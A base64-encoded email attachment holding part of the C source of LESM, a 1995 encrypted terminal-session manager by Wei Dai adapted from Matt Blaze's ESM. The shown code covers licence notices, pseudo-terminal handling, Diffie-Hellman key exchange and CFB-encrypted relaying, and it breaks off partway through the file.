Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "lesm.c"

LyoNCiAqIExFU00gLSBMaW5rIEVuY3J5cHRlZCBTZXNzaW9uIE1hbmFnZXIN
CiAqIHYwLjZhLjAxDQogKiBXZWkgRGFpDQogKiAyLzgvMTk5NQ0KICoNCiAq
IFRoaXMgcHJvZ3JhbSBpcyBhIHF1aWNrIGFuZCBkaXJ0eSBoYWNrIG9mOg0K
ICovDQoNCi8qDQogKiBFU00gLSBFbmNyeXB0ZWQgU2Vzc2lvbiBNYW5hZ2Vy
DQogKiB2MC42YQ0KICogbWF0dCBibGF6ZQ0KICogSmFudWFyeSAxOTk1DQog
Ki8NCg0KLyoNCiAqIFRoZSBhdXRob3Igb2YgdGhpcyBzb2Z0d2FyZSBpcyBN
YXR0IEJsYXplLg0KICogICAgICAgICAgICAgIENvcHlyaWdodCAoYykgMTk5
NSBieSBBVCZULg0KICogUGVybWlzc2lvbiB0byB1c2UsIGNvcHksIGFuZCBt
b2RpZnkgdGhpcyBzb2Z0d2FyZSB3aXRob3V0IGZlZQ0KICogaXMgaGVyZWJ5
IGdyYW50ZWQsIHByb3ZpZGVkIHRoYXQgdGhpcyBlbnRpcmUgbm90aWNlIGlz
IGluY2x1ZGVkIGluDQogKiBhbGwgY29waWVzIG9mIGFueSBzb2Z0d2FyZSB3
aGljaCBpcyBvciBpbmNsdWRlcyBhIGNvcHkgb3INCiAqIG1vZGlmaWNhdGlv
biBvZiB0aGlzIHNvZnR3YXJlIGFuZCBpbiBhbGwgY29waWVzIG9mIHRoZSBz
dXBwb3J0aW5nDQogKiBkb2N1bWVudGF0aW9uIGZvciBzdWNoIHNvZnR3YXJl
Lg0KICoNCiAqIFRoaXMgc29mdHdhcmUgaXMgc3ViamVjdCB0byBVbml0ZWQg
U3RhdGVzIGV4cG9ydCBjb250cm9scy4NCiAqDQogKiBUSElTIFNPRlRXQVJF
IElTIEJFSU5HIFBST1ZJREVEICJBUyBJUyIsIFdJVEhPVVQgQU5ZIEVYUFJF
U1MgT1IgSU1QTElFRA0KICogV0FSUkFOVFkuICBJTiBQQVJUSUNVTEFSLCBO
RUlUSEVSIFRIRSBBVVRIT1JTIE5PUiBBVCZUIE1BS0UgQU5ZDQogKiBSRVBS
RVNFTlRBVElPTiBPUiBXQVJSQU5UWSBPRiBBTlkgS0lORCBDT05DRVJOSU5H
IFRIRSBNRVJDSEFOVEFCSUxJVFkNCiAqIE9GIFRISVMgU09GVFdBUkUgT1Ig
SVRTIEZJVE5FU1MgRk9SIEFOWSBQQVJUSUNVTEFSIFBVUlBPU0UuDQogKi8N
Ci8qDQogKiBTb21lIG9mIHRoaXMgZmlsZSB3YXMgc3RvbGVuIGZyb20gdGhl
IEJTRCAic2NyaXB0IiBwcm9ncmFtLCB3aGljaA0KICogaXMgY292ZXJlZCB1
bmRlciB0aGUgZm9sbG93aW5nIG5vdGljZToNCiAqDQogKiBDb3B5cmlnaHQg
KGMpIDE5ODAgUmVnZW50cyBvZiB0aGUgVW5pdmVyc2l0eSBvZiBDYWxpZm9y
bmlhLg0KICogQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiAqDQogKiBSZWRpc3Ry
aWJ1dGlvbiBhbmQgdXNlIGluIHNvdXJjZSBhbmQgYmluYXJ5IGZvcm1zLCB3
aXRoIG9yIHdpdGhvdXQNCiAqIG1vZGlmaWNhdGlvbiwgYXJlIHBlcm1pdHRl
ZCBwcm92aWRlZCB0aGF0IHRoZSBmb2xsb3dpbmcgY29uZGl0aW9ucw0KICog
YXJlIG1ldDoNCiAqIDEuIFJlZGlzdHJpYnV0aW9ucyBvZiBzb3VyY2UgY29k
ZSBtdXN0IHJldGFpbiB0aGUgYWJvdmUgY29weXJpZ2h0DQogKiAgICBub3Rp
Y2UsIHRoaXMgbGlzdCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5n
IGRpc2NsYWltZXIuDQogKiAyLiBSZWRpc3RyaWJ1dGlvbnMgaW4gYmluYXJ5
IGZvcm0gbXVzdCByZXByb2R1Y2UgdGhlIGFib3ZlIGNvcHlyaWdodA0KICog
ICAgbm90aWNlLCB0aGlzIGxpc3Qgb2YgY29uZGl0aW9ucyBhbmQgdGhlIGZv
bGxvd2luZyBkaXNjbGFpbWVyIGluIHRoZQ0KICogICAgZG9jdW1lbnRhdGlv
biBhbmQvb3Igb3RoZXIgbWF0ZXJpYWxzIHByb3ZpZGVkIHdpdGggdGhlIGRp
c3RyaWJ1dGlvbi4NCiAqIDMuIEFsbCBhZHZlcnRpc2luZyBtYXRlcmlhbHMg
bWVudGlvbmluZyBmZWF0dXJlcyBvciB1c2Ugb2YgdGhpcyBzb2Z0d2FyZQ0K
ICogICAgbXVzdCBkaXNwbGF5IHRoZSBmb2xsb3dpbmcgYWNrbm93bGVkZ2Vt
ZW50Og0KICoJVGhpcyBwcm9kdWN0IGluY2x1ZGVzIHNvZnR3YXJlIGRldmVs
b3BlZCBieSB0aGUgVW5pdmVyc2l0eSBvZg0KICoJQ2FsaWZvcm5pYSwgQmVy
a2VsZXkgYW5kIGl0cyBjb250cmlidXRvcnMuDQogKiA0LiBOZWl0aGVyIHRo
ZSBuYW1lIG9mIHRoZSBVbml2ZXJzaXR5IG5vciB0aGUgbmFtZXMgb2YgaXRz
IGNvbnRyaWJ1dG9ycw0KICogICAgbWF5IGJlIHVzZWQgdG8gZW5kb3JzZSBv
ciBwcm9tb3RlIHByb2R1Y3RzIGRlcml2ZWQgZnJvbSB0aGlzIHNvZnR3YXJl
DQogKiAgICB3aXRob3V0IHNwZWNpZmljIHByaW9yIHdyaXR0ZW4gcGVybWlz
c2lvbi4NCiAqDQogKiBUSElTIFNPRlRXQVJFIElTIFBST1ZJREVEIEJZIFRI
RSBSRUdFTlRTIEFORCBDT05UUklCVVRPUlMgYGBBUyBJUycnIEFORA0KICog
QU5ZIEVYUFJFU1MgT1IgSU1QTElFRCBXQVJSQU5USUVTLCBJTkNMVURJTkcs
IEJVVCBOT1QgTElNSVRFRCBUTywgVEhFDQogKiBJTVBMSUVEIFdBUlJBTlRJ
RVMgT0YgTUVSQ0hBTlRBQklMSVRZIEFORCBGSVRORVNTIEZPUiBBIFBBUlRJ
Q1VMQVIgUFVSUE9TRQ0KICogQVJFIERJU0NMQUlNRUQuICBJTiBOTyBFVkVO
VCBTSEFMTCBUSEUgUkVHRU5UUyBPUiBDT05UUklCVVRPUlMgQkUgTElBQkxF
DQogKiBGT1IgQU5ZIERJUkVDVCwgSU5ESVJFQ1QsIElOQ0lERU5UQUwsIFNQ
RUNJQUwsIEVYRU1QTEFSWSwgT1IgQ09OU0VRVUVOVElBTA0KICogREFNQUdF
UyAoSU5DTFVESU5HLCBCVVQgTk9UIExJTUlURUQgVE8sIFBST0NVUkVNRU5U
IE9GIFNVQlNUSVRVVEUgR09PRFMNCiAqIE9SIFNFUlZJQ0VTOyBMT1NTIE9G
IFVTRSwgREFUQSwgT1IgUFJPRklUUzsgT1IgQlVTSU5FU1MgSU5URVJSVVBU
SU9OKQ0KICogSE9XRVZFUiBDQVVTRUQgQU5EIE9OIEFOWSBUSEVPUlkgT0Yg
TElBQklMSVRZLCBXSEVUSEVSIElOIENPTlRSQUNULCBTVFJJQ1QNCiAqIExJ
QUJJTElUWSwgT1IgVE9SVCAoSU5DTFVESU5HIE5FR0xJR0VOQ0UgT1IgT1RI
RVJXSVNFKSBBUklTSU5HIElOIEFOWSBXQVkNCiAqIE9VVCBPRiBUSEUgVVNF
IE9GIFRISVMgU09GVFdBUkUsIEVWRU4gSUYgQURWSVNFRCBPRiBUSEUgUE9T
U0lCSUxJVFkgT0YNCiAqIFNVQ0ggREFNQUdFLg0KICovDQoNCiNpZm5kZWYg
bGludA0KY2hhciBjb3B5cmlnaHQxW10gPQ0KIkAoIykgQ29weXJpZ2h0IChj
KSAxOTgwIFJlZ2VudHMgb2YgdGhlIFVuaXZlcnNpdHkgb2YgQ2FsaWZvcm5p
YS5cblwNCiBBbGwgcmlnaHRzIHJlc2VydmVkLlxuIjsNCmNoYXIgY29weXJp
Z2h0MltdID0NCiJAKCMpIENvcHlyaWdodCAoYykgMTk5NSBBVCZUXG5BbGwg
cmlnaHRzIHJlc2VydmVkLlxuIjsNCiNlbmRpZiAvKiBub3QgbGludCAqLw0K
DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQu
aD4NCiNpbmNsdWRlIDx0ZXJtaW9zLmg+DQojaWZuZGVmIFNVTg0KI2luY2x1
ZGUgPHN5cy9pb2N0bC5oPg0KI2VuZGlmDQojaW5jbHVkZSA8c3lzL3RpbWUu
aD4NCiNpbmNsdWRlIDxzeXMvZmlsZS5oPg0KI2luY2x1ZGUgPHN5cy9zaWdu
YWwuaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxzdGRpby5o
Pg0KI2luY2x1ZGUgImdsb2JhbC5oIg0KI2luY2x1ZGUgInJzYXJlZi5oIg0K
I2luY2x1ZGUgImVzbS5oIg0KDQoNCmNoYXIJKnNoZWxsOw0KaW50CW1hc3Rl
cjsNCmludAlzbGF2ZTsNCmludAlzdWJjaGlsZDsNCg0KaW50IGVzY2FwZT0w
MzY7IC8qIF5eICovDQppbnQgY2lwaHN0YXRlPTA7DQppbnQgY2lwaGJ5dGU9
MDsNCg0KaW50IGtleWVkPTA7DQoNCnN0cnVjdAl0ZXJtaW9zIHR0Ow0Kc3Ry
dWN0CXdpbnNpemUgd2luOw0KaW50CWxiOw0KaW50CWw7DQpjaGFyCWxpbmVb
XSA9ICIvZGV2L3B0eVhYIjsNCmludAlhZmxnOw0KDQojZGVmaW5lIFJFTU9U
RSAwDQojZGVmaW5lIExPQ0FMIDENCiNkZWZpbmUgQ0FMQyAyDQoNCmludCBt
b2RlPUxPQ0FMOw0KaW50IHBhcmFub2lkPTA7DQoNCiNkZWZpbmUgU0xfU1RB
UlQgMA0KI2RlZmluZSBTTF9HT1QxIDENCiNkZWZpbmUgU0xfR09UMiAyDQoj
ZGVmaW5lIFNMX0dPVDMgMw0KI2RlZmluZSBTTF9HT1Q0IDQNCiNkZWZpbmUg
U0xfS0VZSU5HIDUNCiNkZWZpbmUgU0xfQ1JZUFQgNg0KaW50IHNsb3V0c3Rh
dGU9U0xfU1RBUlQ7DQpjaGFyICpjbWQ9TlVMTDsNCg0KI2RlZmluZSBUUkFO
UyAwDQojZGVmaW5lIENNRFdBSVQgMQ0KI2RlZmluZSBDSVBIRVIgMg0KI2Rl
ZmluZSBLRVlXQUlUIDMNCg0KI2RlZmluZSBJVjAgMA0KI2RlZmluZSBJVjEg
MQ0KI2RlZmluZSBJVjIgMg0KI2RlZmluZSBJVjMgMw0KI2RlZmluZSBDMCAg
NA0KI2RlZmluZSBDMSAgNQ0KDQppbnQgc3RhdGU9VFJBTlM7DQppbnQgY3N0
YXRlPUlWMDsNCg0KRklMRSAqZnBtYXN0ZXI7DQoNCnN0cnVjdCB0aW1ldmFs
IHR2UGF1c2U9ezAsMTAwMDB9Ow0Kc3RydWN0IHRpbWV2YWwgdHZOb1BhdXNl
PXswLDB9Ow0KDQp1bnNpZ25lZCBjaGFyIGZpbGxlciA9ICh1bnNpZ25lZCBj
aGFyKSAzMTsNCg0KI2RlZmluZSBid3JpdGUoZnAsYnVmLGxlbikgKGZ3cml0
ZShidWYsbGVuLDEsZnApKQ0KDQptYWluKGFyZ2MsIGFyZ3YpDQoJaW50IGFy
Z2M7DQoJY2hhciAqYXJndltdOw0Kew0KCWV4dGVybiBjaGFyICpvcHRhcmc7
DQoJZXh0ZXJuIGludCBvcHRpbmQ7DQoJaW50IGNoLCByZXN1bHQ7DQoJdm9p
ZCBmaW5pc2goKTsNCgljaGFyICpnZXRlbnYoKTsNCglmZF9zZXQgZmRzOw0K
ICAgICAgICBzdHJ1Y3QgdGltZXZhbCB0djsNCg0KCXdoaWxlICgoY2ggPSBn
ZXRvcHQoYXJnYywgYXJndiwgImU6YjpzcGxyY2kiKSkgIT0gRU9GKQ0KCSAg
CXN3aXRjaCgoY2hhciljaCkgew0KCSAgCSAgICBjYXNlICdlJzoNCgkgIAkJ
Y21kPW9wdGFyZzsNCgkgIAkJYnJlYWs7DQogICAgICAgICAgICAgICAgICAg
IGNhc2UgJ2InOg0KICAgICAgICAgICAgICAgICAgICAJdHZQYXVzZS50dl91
c2VjPShsb25nKTEwMDAwMDAvYXRvbChvcHRhcmcpOw0KICAgICAgICAgICAg
ICAgICAgICAgICAgYnJlYWs7DQoJICAJICAgIGNhc2UgJ2knOg0KCSAgCSAg
ICBjYXNlICdzJzoNCgkgIAkgICAgY2FzZSAncCc6DQoJICAJCXBhcmFub2lk
PTE7DQoJICAJICAgIGNhc2UgJ3InOg0KCSAgCQltb2RlPVJFTU9URTsNCgkg
IAkJYnJlYWs7DQoJICAJICAgIGNhc2UgJ2wnOg0KCSAgCQltb2RlPUxPQ0FM
Ow0KCSAgCQlicmVhazsNCgkgIAkgICAgY2FzZSAnYyc6DQoJICAJCW1vZGU9
Q0FMQzsNCgkgIAkJYnJlYWs7DQoJICAJICAgIGNhc2UgJz8nOg0KCSAgCSAg
ICBkZWZhdWx0Og0KCSAgCQlmcHJpbnRmKHN0ZGVyciwNCgkgIAkJICAgInVz
YWdlOiBsZXNtIFstcmxjXSBbLWIgYmFuZHdpZHRoXSBbLWUgcHJvZ3JhbVxu
Iik7DQoJICAJCWV4aXQoMSk7DQoJICAJfQ0KCWFyZ2MgLT0gb3B0aW5kOw0K
CWFyZ3YgKz0gb3B0aW5kOw0KDQoJaWYgKChzaGVsbD1nZXRlbnYoIlNIRUxM
IikpID09IE5VTEwpDQoJCXNoZWxsID0gIi9iaW4vc2giOw0KCQ0KICAgICAg
CWdldG1hc3RlcigpOw0KDQoJKHZvaWQpIHNpZ25hbChTSUdDSExELCBmaW5p
c2gpOw0KCXN1YmNoaWxkID0gZm9yaygpOw0KCWlmIChzdWJjaGlsZCA8IDAp
IHsNCgkJcGVycm9yKCJmb3JrIik7DQoJCWZhaWwoKTsNCgl9DQoJaWYgKHN1
YmNoaWxkPT0wKQ0KCQlkb3NoZWxsKCk7DQoJZWxzZSB7DQoJCS8qIG1haW4g
bG9vcCAqLw0KCQlwcmludGYoIkxFU00gdjAuNmEuMDEsIGhhY2tlZCBieSBX
ZWkgRGFpIGZyb20gRVNNIHYwLjZhIC0gZW5jcnlwdGVkIHNlc3Npb24gbWFu
YWdlclxuIik7DQoJCXByaW50ZigiICAgIGJ5IE1hdHQgQmxhemUsIEFUJlQg
QmVsbCBMYWJzLCBKYW51YXJ5IDE5OTVcbiIpOw0KCSAgICAgICAJcmFuZGlu
aXQoKTsNCgkJY2lwaGVyaW5pdCgpOw0KCQlzd2l0Y2ggKG1vZGUpIHsNCgkJ
ICAgIGNhc2UgUkVNT1RFOg0KCQkJaWYgKHBhcmFub2lkKQ0KCQkJICAgICBw
cmludGYoInJlbW90ZSBzZXJ2ZXIgcmVhZHlcbiIpOw0KCQkJZWxzZQ0KCQkJ
ICAgICBwcmludGYoInJlbW90ZSBzZXJ2ZXIgcmVhZHk7IGN0bC1eIHRvIGVz
Y2FwZVxuIik7DQoJCQlicmVhazsNCgkJICAgIGNhc2UgTE9DQUw6DQoJCQlw
cmludGYoImxvY2FsIGxheWVyIHJlYWR5IChydW4gJ2xlc20gLXMnIG9uIHJl
bW90ZSlcbiIpOw0KCQkJYnJlYWs7ICANCgkJICAgIGRlZmF1bHQ6ICAvKiBu
b3QgeWV0ICovDQoJCQlwcmludGYoImxlc20gcmVhZHlcbiIpOw0KCQl9DQoJ
CXJhd3R0eSgpOw0KCQlmcG1hc3Rlcj1mZG9wZW4obWFzdGVyLCJ3Iik7DQoJ
CWlmIChmcG1hc3RlciA9PSBOVUxMKQ0KCQkJZG9uZSgpOw0KCQlpZiAocGFy
YW5vaWQpDQoJCQlzdGFydHNlc3Npb24oKTsNCiAgICAgICAgICAgIA0KICAg
ICAgICAgICAgICAgIHdoaWxlKDEpDQogICAgICAgICAgICAgICAgew0KCQkJ
RkRfWkVSTygmZmRzKTsNCgkJCUZEX1NFVCgwLCZmZHMpOw0KICAgICAgICAg
ICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICB0dj10
dk5vUGF1c2U7DQogICAgICAgICAgICAgICAgICAgICAgICByZXN1bHQ9c2Vs
ZWN0IChGRF9TRVRTSVpFLCZmZHMsTlVMTCxOVUxMLCZ0dik7DQoNCiAgICAg
ICAgICAgICAgICAgICAgICAgIGlmIChyZXN1bHQ9PTEpDQogICAgICAgICAg
ICAgICAgICAgICAgICAJZG9pbnB1dCgpOw0KDQogICAgICAJICAgICAgICAg
ICAgICAgIGlmIChtb2RlPT1MT0NBTCAmJiBzbG91dHN0YXRlPT1TTF9DUllQ
VCAmJiByZXN1bHQ9PTApDQogICAgICAgICAgICAgICAgICAgICAgICAJZG9z
bGF2ZWluKGZpbGxlcik7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgaWYgKHJlc3VsdDwwKQ0K
ICAgICAgICAgICAgICAgICAgICAgICAgCWJyZWFrOw0KDQoJICAgICAgIAkJ
RkRfWkVSTygmZmRzKTsNCgkgICAgICAgCQlGRF9TRVQobWFzdGVyLCZmZHMp
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAg
ICAgICAgICB0dj10dk5vUGF1c2U7DQogICAgICAgICAgICAgICAgICAgICAg
ICByZXN1bHQ9c2VsZWN0IChGRF9TRVRTSVpFLCZmZHMsTlVMTCxOVUxMLCZ0
dik7DQoJICAgICAgIAkJICAgICAgICAgICAgICAgICAgICAJDQogICAgICAg
ICAgICAgICAgICAgICAgICBpZiAocmVzdWx0PT0xKQ0KICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICBkb291dHB1dCgpOw0KDQogICAgICAgICAg
ICAgICAgICAgICAgICBpZiAobW9kZT09UkVNT1RFICYmIHN0YXRlPT1DSVBI
RVIgJiYgcmVzdWx0PT0wKQ0KICAgICAgICAgICAgICAgICAgICAgICAgCWRv
bWFzdGVyb3V0KGZpbGxlcik7DQoNCiAgICAgICAgICAgICAgICAgICAgICAg
IGlmIChyZXN1bHQ8MCkNCiAgICAgICAgICAgICAgICAgICAgICAgIAlicmVh
azsNCgkJfQ0KCQlkb25lKCk7DQoJfSAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIA0KfQ0KDQpkb2lucHV0KCkNCnsNCglpbnQg
Y2M7DQoJaW50IGk7DQoJc3RhdGljIHVuc2lnbmVkIGNoYXIgaWJ1Zls1MTJd
Ow0KCQ0KCWlmICgoY2MgPSByZWFkKDAsIGlidWYsIDUxMikpID4gMCkgew0K
CQlzd2l0Y2ggKG1vZGUpIHsNCgkJICAgIGNhc2UgUkVNT1RFOg0KCQkJZm9y
IChpPTA7IGk8Y2M7IGkrKykNCgkJCQlkb21hc3RlcmluKGlidWZbaV0pOw0K
CQkJYnJlYWs7DQoJCSAgICBjYXNlIExPQ0FMOg0KCQkJZm9yIChpPTA7IGk8
Y2M7IGkrKykNCgkJCQlkb3NsYXZlaW4oaWJ1ZltpXSk7DQoJCQlicmVhazsN
CgkJICAgIGRlZmF1bHQ6DQoJCQlmb3IgKGk9MDsgaTxjYzsgaSsrKQ0KCQkJ
CWJ3cml0ZShmcG1hc3RlciwmaWJ1ZltpXSwxKTsNCgkJCWJyZWFrOw0KCQl9
DQoJCWZmbHVzaChmcG1hc3Rlcik7DQoJCWZmbHVzaChzdGRvdXQpOw0KCX0g
ZWxzZQ0KCQlkb25lKCk7DQp9DQoNCmRvc2xhdmVpbihpYnVmKQ0KICAgICB1
bnNpZ25lZCBjaGFyIGlidWY7DQp7DQoJaW50IGM7DQoJc3RhdGljIGludCBj
b3VudD0wOw0KICAgICAgICBzdHJ1Y3QgdGltZXZhbCB0djsNCgkNCglzd2l0
Y2ggKHNsb3V0c3RhdGUpIHsNCgkgICAgY2FzZSBTTF9DUllQVDoNCgkJaWYg
KGlidWY9PWVzY2FwZSkgew0KCQkJYndyaXRlKHN0ZG91dCwiPj4iLDIpOw0K
CQkJZmZsdXNoKHN0ZG91dCk7DQoJCQlpZiAoc2xlc2NhcGUoKSkgew0KCQkJ
CXByaW50ZigicVxyXG5FbnRlcmluZyBDTEVBUlRFWFQgbW9kZVxyXG4iKTsN
CgkJCQlid3JpdGUoZnBtYXN0ZXIsIlBQUFBQUFBQUFBQUFBQUFAiLDE2KTsN
CgkJCQlzbG91dHN0YXRlPVNMX1NUQVJUOw0KCQkJfQ0KCQkJYnJlYWs7DQoJ
CX0JCQkNCgkJYz1jZmI4X2VuY3J5cHQoaWJ1Zik7DQoJCWlmICghKCsrY291
bnQgJSA4KSkNCgkJCWJ3cml0ZShmcG1hc3RlciwiISIsMSk7DQoJCXNlbmRo
ZXgoZnBtYXN0ZXIsYyk7DQogICAgICAgIAl0dj10dlBhdXNlOw0KICAgICAg
ICAgICAgICAgIHNlbGVjdCAoRkRfU0VUU0laRSxOVUxMLE5VTEwsTlVMTCwm
dHYpOw0KCQlicmVhazsNCgkgICAgZGVmYXVsdDoNCgkJYndyaXRlKGZwbWFz
dGVyLCZpYnVmLDEpOw0KCQlicmVhazsNCgl9DQp9DQoNCnNsZXNjYXBlKCkN
CnsNCgljaGFyIGJ1ZjsNCglpbnQgYzsNCglpbnQgZXNjYXBlZD0wOw0KCQ0K
CXdoaWxlIChyZWFkKDAsJmJ1ZiwxKT4wKSB7DQoJCWlmIChlc2NhcGVkKSB7
DQoJCQllc2NhcGVkPTA7DQoJCQlid3JpdGUoZnBtYXN0ZXIsJmJ1ZiwxKTsN
CgkJCWNvbnRpbnVlOw0KCQl9DQoJCWlmIChidWY9PWVzY2FwZSkgew0KCQkJ
Yz1jZmI4X2VuY3J5cHQoYnVmKTsNCgkJCXNlbmRoZXgoZnBtYXN0ZXIsYyk7
DQoJCQlyZXR1cm4gMDsNCgkJfQ0KCQlid3JpdGUoc3Rkb3V0LCZidWYsMSk7
DQoJCWZmbHVzaChzdGRvdXQpOw0KCQlpZiAoYnVmPT0nXFwnKSB7DQoJCQlt
b2RlPWVzY2FwZWQ7DQoJCQljb250aW51ZTsNCgkJfQ0KCQlpZiAoYnVmPT0n
XHInKQ0KCQkJcmV0dXJuIDA7DQoJCWlmIChidWY9PSdDJykgew0KCQkJcmV0
dXJuIDE7DQoJCX0NCgkJcHJpbnRmKCJcclxuVHlwZSBvbmUgb2YgdGhlIGZv
bGxvd2luZzpcclxuIik7DQoJCXByaW50ZigiICBcXFtjaGFyXSB0byBzZW5k
IGNoYXIgYXMgY2xlYXJ0ZXh0XHJcbiIpOw0KCQlwcmludGYoIiAgY3RybC1e
IHRvIHNlbmQgZXNjYXBlIGNoYXJhY3RlclxyXG4iKTsNCgkJcHJpbnRmKCIg
ICdDJyB0byByZXR1cm4gdG8gQ0xFQVJURVhUIHNlc3Npb25cclxuIik7DQoJ
CXByaW50ZigiICA8ZW50ZXI+IHRvIHJldHVybiB0byBlbmNyeXB0ZWQgc2Vz
c2lvblxyXG4iKTsNCgl9DQoJcmV0dXJuIDE7IC8qIHNob3VsZCBuZXZlciBo
YXBwZW4gKi8NCn0NCg0KCQkJICAgICAgIA0KDQpkb21hc3RlcmluKGlidWYp
DQogICAgIHVuc2lnbmVkIGNoYXIgaWJ1ZjsNCnsNCglpbnQgYzsNCgljaGFy
IGNoOw0KCXN0YXRpYyBpbnQgYmFkPTA7DQoJDQoJc3dpdGNoIChzdGF0ZSkg
ew0KCSAgICBjYXNlIFRSQU5TOg0KCSAgCWlmIChpYnVmICE9IGVzY2FwZSkN
CgkgIAkJYndyaXRlKGZwbWFzdGVyLCAmaWJ1ZiwgMSk7DQoJICAJZWxzZSB7
DQoJICAJCXN0YXRlPUNNRFdBSVQ7DQoJICAJCWJ3cml0ZShzdGRvdXQsIj4+
IiwyKTsNCgkgIAkJY3N0YXRlPUlWMDsNCgkgIAl9DQoJICAJYnJlYWs7DQoJ
ICAgIGNhc2UgQ01EV0FJVDoNCgkgIAlpZiAoaWJ1ZiA9PSBlc2NhcGUpIHsN
CgkgIAkJYndyaXRlKGZwbWFzdGVyLCAmaWJ1ZiwgMSk7DQoJICAJCXN0YXRl
PVRSQU5TOw0KCSAgCX0gZWxzZSBzd2l0Y2ggKGlidWYpIHsNCgkgIAkgICAg
Y2FzZSAnXHInOg0KCSAgCSAgICBjYXNlICdcbic6DQoJICAJCWJ3cml0ZShz
dGRvdXQsIlxyXG4iLDIpOw0KCSAgCQlzdGF0ZT1UUkFOUzsNCgkgIAkJYnJl
YWs7DQoJICAJICAgIGNhc2UgJ3MnOg0KCSAgCSAgICBjYXNlICdTJzoNCgkg
IAkJc3RhcnRzZXNzaW9uKExPTkcpOw0KCSAgCQlicmVhazsNCgkgIAkgICAg
Y2FzZSAnUSc6DQoJICAJCWRvbmUoKTsNCgkgIAkJYnJlYWs7DQoJICAJICAg
IGRlZmF1bHQ6DQoJICAJCXByaW50ZigiVHlwZSAncycgdG8gc3RhcnQgZW5j
cnlwdGVkIHNlc3Npb25cclxuIik7DQoJICAJCXByaW50ZigiICAgICAnUScg
dG8gdGVybWluYXRlIHJlbW90ZSBzZXNzaW9uXHJcbiIpOw0KCSAgCQlwcmlu
dGYoIiAgICAgY3RybC1eIHRvIHNlbmQgZXNjYXBlIGNoYXJhY3RlclxyXG4i
KTsNCgkgIAkJcHJpbnRmKCIgICAgIDxlbnRlcj4gdG8gcmV0dXJuIHRvIHNl
c3Npb25cclxuIik7DQoJICAJCWJyZWFrOw0KCSAgCX0NCgkgIAlicmVhazsN
CgkgICAgY2FzZSBDSVBIRVI6DQoJICAJaWYgKHN0cmNocigiMDEyMzQ1Njc4
OWFiY2RlZiEiLGlidWYpIT1OVUxMKSB7DQoJICAJCWJhZD0wOw0KCSAgCQlp
ZiAoKGMgPSBjaXBoZXJvdXQoaWJ1ZikpID49IDApIHsNCgkgIAkJICAgICAg
CWNoPWM7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChj
aCE9ZmlsbGVyKQ0KCSAgCQkJICAgICAgCWJ3cml0ZShmcG1hc3RlciwmY2gs
MSk7DQoJICAJCX0NCgkgIAl9IGVsc2UgaWYgKGJhZCsrID4gMTYpIHsNCgkg
IAkJZGVsa2V5KCk7DQoJICAJCWJ3cml0ZShzdGRvdXQsIlhYWFhYWFhYWFhY
WFhYWFgiLDE2KTsNCgkgIAkJaWYgKHBhcmFub2lkKQ0KCSAgCQkgICAgICAJ
ZG9uZSgpOw0KCSAgCQlzdGF0ZT1UUkFOUzsNCgkgIAl9IGVsc2UNCgkgIAkJ
Y2lwaHN0YXRlPTA7DQoJICAJYnJlYWs7DQoJICAgIGNhc2UgS0VZV0FJVDoN
CgkgIAlpZiAoc3RyY2hyKCIwMTIzNDU2Nzg5YWJjZGVmOiIsaWJ1ZikhPU5V
TEwpIHsNCgkJCW1hc3RlcmtleWluKGlidWYpOw0KCQl9IGVsc2Ugew0KCQkJ
ZGVsa2V5KCk7DQoJCQlid3JpdGUoc3Rkb3V0LCJYWFhYWFhYWFhYWFhYWFhY
IiwxNik7DQoJCQlpZiAocGFyYW5vaWQpDQoJCQkJZG9uZSgpOw0KCQkJc3Rh
dGU9VFJBTlM7DQoJCX0NCgkJYnJlYWs7DQoJfQ0KfQ0KDQppbnQgcHVic3Rh
dD0wOw0KaW50IHB1YnBvcz0wOw0KdW5zaWduZWQgY2hhciBwdWJieXRlPTA7
DQppbnQgcGtzaXplID0gLTE7DQoNCnN0YXJ0c2Vzc2lvbigpDQp7DQoJc3Rh
dGljIHVuc2lnbmVkIGNoYXIgYnVmWzVdID0gezAxNzcsICd+JywgMDE3Nywg
J34nLCAnTCd9Ow0KCXN0YXRpYyB1bnNpZ25lZCBjaGFyIGNvbG9uPSc6JzsN
CglpbnQgaTsNCg0KCXBrbGVuPWRocGFyYW1zW0xPTkddLnByaW1lTGVuOw0K
CXByaW50ZigiU3RhcnRpbmcgcmVtb3RlIHNpZGUgb2YgJWQgYml0IGtleSBl
eGNoYW5nZS5cclxuIixwa2xlbio4KTsNCglpZiAoY3JlYXRlZGgoTE9ORykg
PCAwKQ0KCQlyZXR1cm4gLTE7DQoJYndyaXRlKHN0ZG91dCxidWYsNSk7DQoJ
Zm9yIChpPTA7IGk8cGtsZW47IGkrKykNCgkJc2VuZGhleChzdGRvdXQsb3Vy
cHViW2ldKTsNCglid3JpdGUoc3Rkb3V0LCZjb2xvbiwxKTsNCglwa3NpemU9
TE9ORzsNCglwdWJzdGF0PTA7DQoJcHVicG9zPTA7DQoJcHViYnl0ZT0wOw0K
CXN0YXRlPUtFWVdBSVQ7DQoJcmV0dXJuIDA7DQp9DQoNCnNsdHJhbnNwdWIo
bGVuKQ0Kew0KCXN0YXRpYyB1bnNpZ25lZCBjaGFyIGNvbG9uPSc6JzsNCglp
bnQgaTsNCgkNCglwcmludGYoIlxyXG5TdGFydGluZyBsb2NhbCBrZXkgZXhj
aGFuZ2UuXHJcbiIpOw0KCWZvciAoaT0wOyBpPGxlbjsgaSsrKQ0KCQlzZW5k
aGV4KGZwbWFzdGVyLG91cnB1YltpXSk7DQoJYndyaXRlKGZwbWFzdGVyLCZj
b2xvbiwxKTsNCglwcmludGYoImVudGVyaW5nIEVOQ1JZUFRFRCBtb2RlOyB0
eXBlIGN0cmwtXiB0byBlc2NhcGVcclxuIik7DQp9DQoNCm1hc3RlcmtleWlu
